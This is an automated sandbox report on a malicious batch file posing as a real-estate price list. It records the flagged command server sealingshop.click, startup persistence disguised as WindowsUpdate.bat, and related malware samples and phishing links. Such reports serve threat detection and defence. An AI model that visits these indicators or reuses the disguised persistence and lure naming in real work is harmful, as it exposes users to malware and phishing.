http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html	python.exe, 00000012.00000003.3202808995.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204009322.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202197981.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3206731275.0000012D51FA5000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3199473048.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202856613.0000012D51E84000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3198800218.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202908008.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203805160.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203297988.0000012D52AF6000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3206731275.0000012D51FE3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203373400.0000012D527F1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203168656.0000012D51E90000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, _mode_ccm.cpython-39.pyc.16.dr	false		high
http://www.python.org/	request.cpython-39.pyc.1294208279984.18.dr	false		high
https://www.google.com/intl/en/about/products	chromecache_2304.7.dr	false		high
http://bugs.python.org/issue19404	python.exe, 00000012.00000003.3176942722.0000012D51E7B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3176106124.0000012D51E75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000005.00000002.2221477899.0000019E1DB02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromedevtools.github.io/devtools-protocol/	webdriver.py0.16.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/log?format=json&hasfast=true	chromecache_2326.7.dr, chromecache_2335.7.dr	false		high
https://lens.google.com	chromecache_2326.7.dr	false		high
https://sealingshop.click	powershell.exe, 00000005.00000002.2194147217.0000019E0EDCD000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schema.org/WebPage	chromecache_2304.7.dr	false		high
http://www.python.org/2.4/license	python.exe, 00000012.00000003.3167939396.0000012D51FC9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3178737305.0000012D51FC9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3170974101.0000012D51DDA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://csp.withgoogle.com/csp/lcreport/	chromecache_2326.7.dr	false		high
http://bugs.python.org)	python.exe, 00000012.00000003.3177289327.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3182698577.0000012D523BB000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3179926783.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3178047469.0000012D527F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000005.00000002.2221477899.0000019E1DB02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000005.00000002.2194147217.0000019E0F0C9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf	python.exe, 00000012.00000003.3203297988.0000012D52AF6000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203373400.0000012D527F1000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.19.206	www3.l.google.com	United States	15169	GOOGLEUS	false
142.250.181.142	google.com	United States	15169	GOOGLEUS	false
104.21.36.187	sealingshop.click	United States	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
172.217.21.36	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1568178
Start date and time:	2024-12-04 12:19:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat
Detection:	MAL
Classification:	mal100.expl.evad.winBAT@35/1550@17/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 1 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 172.217.19.227, 64.233.165.84, 172.217.19.238, 172.217.17.78, 23.218.208.109, 172.217.21.35, 199.232.214.172, 172.217.19.202, 172.217.19.234, 216.58.208.234, 172.217.19.170, 142.250.181.106, 172.217.17.74, 172.217.17.42, 142.250.181.138, 142.250.181.74, 172.217.21.42, 172.217.19.10, 142.250.181.10, 192.229.221.95, 172.217.17.67, 142.250.181.99, 142.250.181.42, 34.104.35.123, 172.217.17.46
Excluded domains from analysis (whitelisted): clients1.google.com, ssl.gstatic.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target powershell.exe, PID 984 because it is empty
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat

Simulations

Behavior and APIs

Time	Type	Description
06:20:07	API Interceptor	2x Sleep call for process: svchost.exe modified
06:20:09	API Interceptor	64x Sleep call for process: powershell.exe modified
12:20:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	xoJxSAotVM.exe	Get hash	malicious	Vidar	Browse
	https://www.paypal.com/signin/?returnUri=%2Fmyaccount%2Ftransfer%2FpayRequest%2FU-73L43097YS920471H%2FU-21916088VG929353V%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq&id=oSTQ2KyhBfzKABJBD3SmDi49NoivW60lzQASFQ&expId=p2p&onboardData=%7B%22signUpRequest%22%3A%7B%22method%22%3A%22get%22%2C%22url%22%3A%22https%3A%2F%2Fwww.paypal.com%2Fmyaccount%2Ftransfer%2FguestLogin%2FpayRequest%2FU-73L43097YS920471H%2FU-21916088VG929353V%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq%26id%3DoSTQ2KyhBfzKABJBD3SmDi49NoivW60lzQASFQ%22%7D%7D&flowContextData=RDl_AZcF1sl5Rb_6LCOad8Ablnu-W7AxB_i5FzkmY9ljbd6ElIlIteG0y31awgymrSFY-NEhR9oodKgi2Jr_54nHRHUI22A5btXBAz58pUBlVy_icxhdiCyvbxtKkJbyvPwAFXZm9Hu-TuP8fUbi3kD9SI3uQE-nXU-1T6hk9yNEcfLwmQ9q2oXw0Nu89DKUwRZZ-hEgdjZhl4tqKDQiASbkdXigxUyjHWAPt-vOaJzbzisp0scQXF4UF-J1Rto6RYCxskkLambqbUPNkjVq_ZtnTRrfcOFs6AdzgjQZxFjLXCq1M3EW1Aiq9DSZcmtteoSiOkL-Yl_4s2YOFo6jNRRQrcEHNylGYTBCyHc65n4_85NWbx-ikEWoVlI4LXcJW4dftTovp8EWo5xXhEORiceFOjZRVbk5MVtSKHu91b7gPLC3F3USPVAc68XpKKXL_xvsUAp1wPS1patgsMBTMQo3Gwa68P9HfAfTWEjlQ1Yf3yTIWtRpNF8qyyGgAUBLgrJVAT_OmXFJJrX08CV-vxGPkepVr0r1FVRxwTmimvKh55xYEKkfPK5XJKmenbfgUa9CbfH9d_FpW5yVigO-oMpueUaWL8bSCYMeFYr8B1GfpUn9ASsdqnfnFqtpUGY0Y4MI9f0bvAFH6gYvW7ZTeYh_jKu&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000186&utm_unptid=c038b022-b182-11ef-83cc-0118134ab4bf&ppid=RT000186&cnac=US&rsta=en_US%28en-US%29&unptid=c038b022-b182-11ef-83cc-0118134ab4bf&calc=f826437c02759&unp_tpcid=requestmoney-notifications-requestee&page=main%3Aemail%3ART000186&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.294.0&tenant_name=&xt=145585%2C150948%2C104038&link_ref=www.paypal.com_signin	Get hash	malicious	Unknown	Browse
	letter_olivia.law_mercerhole.co.uk.pdf	Get hash	malicious	HTMLPhisher	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	Contract Proposal Documents.pdf	Get hash	malicious	Unknown	Browse
	https://u48081970.ct.sendgrid.net/ls/click?upn=u001.vNxnXXzC2QsasPA6W6ADpt-2Ftorlqu4ypy1cx618BO406CuTHe6Rdpmm4JfxhQmns-2B9IcSpgwJrNHXYfa1uXDUgS9xVKd9ZaAsws4zk7muCg-3DZZr1_86mcl1dEDC9SsRn0J-2B7n6xG4PLWb-2FVElhDs9zkYSfOVUWEBOuIAwgb9WpkpxhmyQMvzh9Kpdo3GVQ9nn-2BdarUcw1Be1RgOuXLzqHPNUHTd4mWAin5j-2BbK5LI9vw-2FwoT4CfXbn2rvr5PC14V-2BoEesvL2IwUpGrOwfyzirkerYq8Bbu6UXfMYK8JypQJLQFTzv9qOKM9xwxbsZEsN-2FS8c7yPpSVyD4JV6Ez1fwyruBZbRT67v2slyMK0dybL01-2FqY1O3quC8MNfOL54dEjEjjjtBhtF8l6gl-2BFk97-2FcagJqrRH-2BP4AOzpSTLN8aGjPkIeZfkWYhxIDr2ShdgJYfmFjbRrp6vD-2BEA0P1tDuf4k2w8KcMQsSCFCuO-2BSnL609Wz8y8d8IiJB-2BVOZstmbWmLPRVsjdic3dco790-2BndBO7DIhPAMWasm-2BSuMUmmKOVREaHHO1TmBLay3m-2Fqnd5qCadiu5n-2BBlTPeuRSd8m6Tx8Sj3LjxuSOmm0dIJIeP096RcuawY-2Bwm35dxyKgk9lwZ2FL0G9hMwSeHpWOjTqpbJ6cwnE0Nv6qjBSfLUN9pmUsuyjY22-2BPk-2Bu2QeCEIGZJeMC2mHR4iXU1Qd68tL0Wn-2BzNpsZPJKME2mpPl5RPmepvjIPYDYzLppde1eyHOjjkxp-2B6BOc-2FRZoyOwKNazhxqqEDxsmGEjLPPvZqanPzaTyGLfYcN0Kc4jZf6lBDAt02aCwmH2QRoGIW7S6jsbtrjJTjOztrvCHISe02saguqYwC4HGC2M60hhERSXlfzGrn5fBrmeO2Z-2BnVPO-2BGSOD-2FR1GgZXWRHW1IcKsHxaS0BjTdT4JTEvq3q-2B2Me7kitfPPju2fy0BbVh1w1AsRRqxG98UgBhZKMLhRZ9ju7VnLLYoEC6281aKRZYKi84zlwZdKcDlGWdCJDSLVukCfyYJScludzZM-3D	Get hash	malicious	Unknown	Browse
	https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402	Get hash	malicious	Unknown	Browse
	Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.eml	Get hash	malicious	Unknown	Browse
	https://jxgy-zcmp.maillist-manage.eu/click/1315cead38f4e738/1315cead38f50cec	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
plus.l.google.com	https://jxgy-zcmp.maillist-manage.eu/click/1315cead38f4e738/1315cead38f50cec	Get hash	malicious	Unknown	Browse	142.250.181.78
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	172.217.17.78
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.250.181.78
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.217.17.46
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.217.17.78
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	172.217.17.78
	file.exe	Get hash	malicious	Amadey, RHADAMANTHYS, Stealc	Browse	172.217.17.78
	https://0azeevmdi7.codedesign.app/	Get hash	malicious	Unknown	Browse	172.217.17.78
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.217.17.46
	https://arul.top/01f3c0dpQXFEQ3l5SA1cBmsbOVh3DEM8Q2MgCVMxQxwwUwklUAoIEyISME4rEVI1JVQ1TkURCEBEeUo?_t1733230843322	Get hash	malicious	Phisher	Browse	172.217.17.78
play.google.com	https://jxgy-zcmp.maillist-manage.eu/click/1315cead38f4e738/1315cead38f50cec	Get hash	malicious	Unknown	Browse	172.217.19.206
	http://egaddfc.r.tsp1-brevo.net/tr/cl/VlRkeh8daCV1pZfgR5EHrR-o8lmyhAILd7DQckUc3zxA1cqrBMxAixxV6bkSWktF5jjfiD49OUcyAaWfxFZgfaki1ECx-s1gFFYxN_Yf6YC8XWqmZR1nOe30_Z7q9WiwBEwmlNTbf6J9SLTU8icgaaOT8DBKkNNzMBnpoS36k__Kips7BosChjdtkO_aCovhajbSOx8PdR6Xp-VX7biqxPDq4fnL9BgeB75FUcUq53QyueiO-orCgvKNE9H430bioFJIfk_Q78xWR2PMDtKh-y8n	Get hash	malicious	Unknown	Browse	172.217.19.238
	https://gaajbai.r.tsp1-brevo.net/tr/cl/Ipv8tLM_6XFaC46-AyySv62xU11Gam_6wBo9PhTW-GrEoJin-pUABRxsrn3Ohs7KWpubjNC13uikhD3jyVC-cicv7bjCnB_FKR8ntrSWj62GHX8lS9bF6DjFTod72jGT5orFYUcuEZfFLhYH0PJw3YcV5REfPqGJ30gJCwxSfXvPcvLXBVOydAdUyQvhvO7-TVZ6o3kdYYQkVDMJ3dx52jV6Fez8X6pInuPyzqbRfl7bceqY4dWENNeM8e3cXfQsiIiS3GOEtSEu79PK1qkXINb6	Get hash	malicious	Unknown	Browse	172.217.19.206
	https://gaajbai.r.tsp1-brevo.net/tr/cl/Ipv8tLM_6XFaC46-AyySv62xU11Gam_6wBo9PhTW-GrEoJin-pUABRxsrn3Ohs7KWpubjNC13uikhD3jyVC-cicv7bjCnB_FKR8ntrSWj62GHX8lS9bF6DjFTod72jGT5orFYUcuEZfFLhYH0PJw3YcV5REfPqGJ30gJCwxSfXvPcvLXBVOydAdUyQvhvO7-TVZ6o3kdYYQkVDMJ3dx52jV6Fez8X6pInuPyzqbRfl7bceqY4dWENNeM8e3cXfQsiIiS3GOEtSEu79PK1qkXINb6	Get hash	malicious	Unknown	Browse	172.217.19.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	172.217.19.238
	https://0azeevmdi7.codedesign.app/	Get hash	malicious	Unknown	Browse	172.217.19.206
	https://arul.top/01f3c0dpQXFEQ3l5SA1cBmsbOVh3DEM8Q2MgCVMxQxwwUwklUAoIEyISME4rEVI1JVQ1TkURCEBEeUo?_t1733230843322	Get hash	malicious	Phisher	Browse	172.217.19.238
	http://www.abvt.com.au/netsuite-user	Get hash	malicious	Unknown	Browse	172.217.19.238
	http://www.abvt.com.au/netsuite-user	Get hash	malicious	Unknown	Browse	172.217.19.206
	https://edveha.com	Get hash	malicious	Unknown	Browse	172.217.19.206

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	fUHl7rElXU.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.6
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	letter_olivia.law_mercerhole.co.uk.pdf	Get hash	malicious	HTMLPhisher	Browse	172.67.149.151
	Order_DEC2024.wsf	Get hash	malicious	Remcos	Browse	104.21.84.67
	Bank Swift and SOA PRN0072003410853_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	https://u48081970.ct.sendgrid.net/ls/click?upn=u001.vNxnXXzC2QsasPA6W6ADpt-2Ftorlqu4ypy1cx618BO406CuTHe6Rdpmm4JfxhQmns-2B9IcSpgwJrNHXYfa1uXDUgS9xVKd9ZaAsws4zk7muCg-3DZZr1_86mcl1dEDC9SsRn0J-2B7n6xG4PLWb-2FVElhDs9zkYSfOVUWEBOuIAwgb9WpkpxhmyQMvzh9Kpdo3GVQ9nn-2BdarUcw1Be1RgOuXLzqHPNUHTd4mWAin5j-2BbK5LI9vw-2FwoT4CfXbn2rvr5PC14V-2BoEesvL2IwUpGrOwfyzirkerYq8Bbu6UXfMYK8JypQJLQFTzv9qOKM9xwxbsZEsN-2FS8c7yPpSVyD4JV6Ez1fwyruBZbRT67v2slyMK0dybL01-2FqY1O3quC8MNfOL54dEjEjjjtBhtF8l6gl-2BFk97-2FcagJqrRH-2BP4AOzpSTLN8aGjPkIeZfkWYhxIDr2ShdgJYfmFjbRrp6vD-2BEA0P1tDuf4k2w8KcMQsSCFCuO-2BSnL609Wz8y8d8IiJB-2BVOZstmbWmLPRVsjdic3dco790-2BndBO7DIhPAMWasm-2BSuMUmmKOVREaHHO1TmBLay3m-2Fqnd5qCadiu5n-2BBlTPeuRSd8m6Tx8Sj3LjxuSOmm0dIJIeP096RcuawY-2Bwm35dxyKgk9lwZ2FL0G9hMwSeHpWOjTqpbJ6cwnE0Nv6qjBSfLUN9pmUsuyjY22-2BPk-2Bu2QeCEIGZJeMC2mHR4iXU1Qd68tL0Wn-2BzNpsZPJKME2mpPl5RPmepvjIPYDYzLppde1eyHOjjkxp-2B6BOc-2FRZoyOwKNazhxqqEDxsmGEjLPPvZqanPzaTyGLfYcN0Kc4jZf6lBDAt02aCwmH2QRoGIW7S6jsbtrjJTjOztrvCHISe02saguqYwC4HGC2M60hhERSXlfzGrn5fBrmeO2Z-2BnVPO-2BGSOD-2FR1GgZXWRHW1IcKsHxaS0BjTdT4JTEvq3q-2B2Me7kitfPPju2fy0BbVh1w1AsRRqxG98UgBhZKMLhRZ9ju7VnLLYoEC6281aKRZYKi84zlwZdKcDlGWdCJDSLVukCfyYJScludzZM-3D	Get hash	malicious	Unknown	Browse	104.16.123.96
	https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402	Get hash	malicious	Unknown	Browse	104.17.25.14
	Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.eml	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://jxgy-zcmp.maillist-manage.eu/click/1315cead38f4e738/1315cead38f50cec	Get hash	malicious	Unknown	Browse	172.64.144.254
	MicrosoftScript.ps1	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	172.67.19.24

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	xoJxSAotVM.exe	Get hash	malicious	Vidar	Browse	52.149.20.212 13.107.246.63
	https://www.paypal.com/signin/?returnUri=%2Fmyaccount%2Ftransfer%2FpayRequest%2FU-73L43097YS920471H%2FU-21916088VG929353V%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq&id=oSTQ2KyhBfzKABJBD3SmDi49NoivW60lzQASFQ&expId=p2p&onboardData=%7B%22signUpRequest%22%3A%7B%22method%22%3A%22get%22%2C%22url%22%3A%22https%3A%2F%2Fwww.paypal.com%2Fmyaccount%2Ftransfer%2FguestLogin%2FpayRequest%2FU-73L43097YS920471H%2FU-21916088VG929353V%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq%26id%3DoSTQ2KyhBfzKABJBD3SmDi49NoivW60lzQASFQ%22%7D%7D&flowContextData=RDl_AZcF1sl5Rb_6LCOad8Ablnu-W7AxB_i5FzkmY9ljbd6ElIlIteG0y31awgymrSFY-NEhR9oodKgi2Jr_54nHRHUI22A5btXBAz58pUBlVy_icxhdiCyvbxtKkJbyvPwAFXZm9Hu-TuP8fUbi3kD9SI3uQE-nXU-1T6hk9yNEcfLwmQ9q2oXw0Nu89DKUwRZZ-hEgdjZhl4tqKDQiASbkdXigxUyjHWAPt-vOaJzbzisp0scQXF4UF-J1Rto6RYCxskkLambqbUPNkjVq_ZtnTRrfcOFs6AdzgjQZxFjLXCq1M3EW1Aiq9DSZcmtteoSiOkL-Yl_4s2YOFo6jNRRQrcEHNylGYTBCyHc65n4_85NWbx-ikEWoVlI4LXcJW4dftTovp8EWo5xXhEORiceFOjZRVbk5MVtSKHu91b7gPLC3F3USPVAc68XpKKXL_xvsUAp1wPS1patgsMBTMQo3Gwa68P9HfAfTWEjlQ1Yf3yTIWtRpNF8qyyGgAUBLgrJVAT_OmXFJJrX08CV-vxGPkepVr0r1FVRxwTmimvKh55xYEKkfPK5XJKmenbfgUa9CbfH9d_FpW5yVigO-oMpueUaWL8bSCYMeFYr8B1GfpUn9ASsdqnfnFqtpUGY0Y4MI9f0bvAFH6gYvW7ZTeYh_jKu&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000186&utm_unptid=c038b022-b182-11ef-83cc-0118134ab4bf&ppid=RT000186&cnac=US&rsta=en_US%28en-US%29&unptid=c038b022-b182-11ef-83cc-0118134ab4bf&calc=f826437c02759&unp_tpcid=requestmoney-notifications-requestee&page=main%3Aemail%3ART000186&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.294.0&tenant_name=&xt=145585%2C150948%2C104038&link_ref=www.paypal.com_signin	Get hash	malicious	Unknown	Browse	52.149.20.212 13.107.246.63
	letter_olivia.law_mercerhole.co.uk.pdf	Get hash	malicious	HTMLPhisher	Browse	52.149.20.212 13.107.246.63
	Contract Proposal Documents.pdf	Get hash	malicious	Unknown	Browse	52.149.20.212 13.107.246.63
	Order_DEC2024.wsf	Get hash	malicious	Remcos	Browse	52.149.20.212 13.107.246.63
	https://u48081970.ct.sendgrid.net/ls/click?upn=u001.vNxnXXzC2QsasPA6W6ADpt-2Ftorlqu4ypy1cx618BO406CuTHe6Rdpmm4JfxhQmns-2B9IcSpgwJrNHXYfa1uXDUgS9xVKd9ZaAsws4zk7muCg-3DZZr1_86mcl1dEDC9SsRn0J-2B7n6xG4PLWb-2FVElhDs9zkYSfOVUWEBOuIAwgb9WpkpxhmyQMvzh9Kpdo3GVQ9nn-2BdarUcw1Be1RgOuXLzqHPNUHTd4mWAin5j-2BbK5LI9vw-2FwoT4CfXbn2rvr5PC14V-2BoEesvL2IwUpGrOwfyzirkerYq8Bbu6UXfMYK8JypQJLQFTzv9qOKM9xwxbsZEsN-2FS8c7yPpSVyD4JV6Ez1fwyruBZbRT67v2slyMK0dybL01-2FqY1O3quC8MNfOL54dEjEjjjtBhtF8l6gl-2BFk97-2FcagJqrRH-2BP4AOzpSTLN8aGjPkIeZfkWYhxIDr2ShdgJYfmFjbRrp6vD-2BEA0P1tDuf4k2w8KcMQsSCFCuO-2BSnL609Wz8y8d8IiJB-2BVOZstmbWmLPRVsjdic3dco790-2BndBO7DIhPAMWasm-2BSuMUmmKOVREaHHO1TmBLay3m-2Fqnd5qCadiu5n-2BBlTPeuRSd8m6Tx8Sj3LjxuSOmm0dIJIeP096RcuawY-2Bwm35dxyKgk9lwZ2FL0G9hMwSeHpWOjTqpbJ6cwnE0Nv6qjBSfLUN9pmUsuyjY22-2BPk-2Bu2QeCEIGZJeMC2mHR4iXU1Qd68tL0Wn-2BzNpsZPJKME2mpPl5RPmepvjIPYDYzLppde1eyHOjjkxp-2B6BOc-2FRZoyOwKNazhxqqEDxsmGEjLPPvZqanPzaTyGLfYcN0Kc4jZf6lBDAt02aCwmH2QRoGIW7S6jsbtrjJTjOztrvCHISe02saguqYwC4HGC2M60hhERSXlfzGrn5fBrmeO2Z-2BnVPO-2BGSOD-2FR1GgZXWRHW1IcKsHxaS0BjTdT4JTEvq3q-2B2Me7kitfPPju2fy0BbVh1w1AsRRqxG98UgBhZKMLhRZ9ju7VnLLYoEC6281aKRZYKi84zlwZdKcDlGWdCJDSLVukCfyYJScludzZM-3D	Get hash	malicious	Unknown	Browse	52.149.20.212 13.107.246.63
	lnvoice-1620804301.pdf .js	Get hash	malicious	RHADAMANTHYS	Browse	52.149.20.212 13.107.246.63
	lnvoice-1620804301.pdf (1).js	Get hash	malicious	RHADAMANTHYS	Browse	52.149.20.212 13.107.246.63
